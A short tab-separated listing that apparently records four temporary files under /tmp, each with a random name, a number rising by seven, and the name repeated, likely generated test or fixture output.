/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	916	OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	923	g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	930	zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	937	28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ